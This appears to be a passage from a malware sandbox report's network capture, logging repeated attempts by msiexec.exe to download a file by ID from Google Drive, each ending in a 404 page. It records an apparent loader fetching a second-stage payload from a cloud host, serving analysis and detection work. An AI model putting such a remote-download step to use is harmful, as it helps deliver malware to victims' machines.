                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aHHPcwwNchzFvRqPKNxNNA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.950004142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:19 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:20 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:19 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-IFBlSEacyJDcKC8yjacbnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.950005142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:20 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:21 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS0dH5gPxIKLQjaHCRjaCJV6_PrmqNR0-rqbItUL5OopRcL5tlvwRNTmfX5W4MI9VOl
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:21 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-0O89hh-CmwB9Q42LRc6Dmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 55 4d 59 67 74 41 6d 5f 56 35 63 71 49 44 4f 36 61 70 5f 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NUMYgtAm_V5cqIDO6ap_pA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.950006142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:22 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:22 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:22 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-e-2oS7jVHB4QarwDvAXZSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.950007142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:23 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:23 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC5T3pxZ1cnATdwY8kai8GqW67n_7BOTtkv2U75vsoQ1Rzbc68dJbeYuJV9vm9pKShho
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:23 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-HWyt--RSRtmhR3Ze0MUUEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 54 66 49 52 78 47 71 41 37 50 5f 4c 5a 39 6b 2d 55 43 73 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gTfIRxGqA7P_LZ9k-UCsEA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.950008142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:24 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:24 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:24 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-HAsEh6yo4AMw1wuGAnCCyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.950009142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:25 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:25 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgRcI9kJLWCVj4zNnkPyO5ink68JUGSXs5qbPJacsva0zJKtLh9xmNEpl88XFj__sFJX
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:25 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: script-src 'nonce-YPfkk4IEd0PsBU5N-VAiwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 66 6a 35 6e 30 61 69 7a 5f 75 79 45 4b 76 48 6c 5a 74 2d 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rfj5n0aiz_uyEKvHlZt-cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.950010142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:26 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:27 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:27 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: script-src 'nonce-bLp1Do-XvMaWpSytI55Czw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.950011142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:28 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:28 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC7k3flitRR7HbbtluKTf9iGhgR5oOgoK5Tj00YCxAajma2GkjSyiCiuYDLogLkiriY3OcrNJ1M
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:28 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-YlM5fySCOx6Y8U4HjFQK3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
